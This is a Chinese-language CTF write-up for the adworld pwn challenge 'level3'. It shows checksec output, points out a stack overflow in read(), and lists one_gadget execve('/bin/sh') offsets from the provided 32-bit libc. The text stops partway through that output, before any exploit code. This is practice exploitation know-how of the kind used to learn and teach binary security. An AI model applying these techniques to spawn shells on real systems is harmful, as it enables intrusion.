前言
pwn新手区还残留一题,就是这个level3,当初好像是因为远程打不通所以没做掉.我记得当初好像是没有给库的,现在给了个libc_32.so.6
0x00.检查保护
devil@ubuntu:~/adworld/pwn$ checksec level3
[*] '/home/devil/adworld/pwn/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found ;可以进行栈溢出
NX: NX enabled
PIE: No PIE (0x8048000)
0x01.栈溢出漏洞
read函数有明显栈溢出漏洞,程序本身不存在system("/bin/sh"),无法通过溢出直接getshell
0x02.one_gadget
自从学会了使用one_gadget,遇到给libc的题目屡试不爽
one_gadget使用实战看此
devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065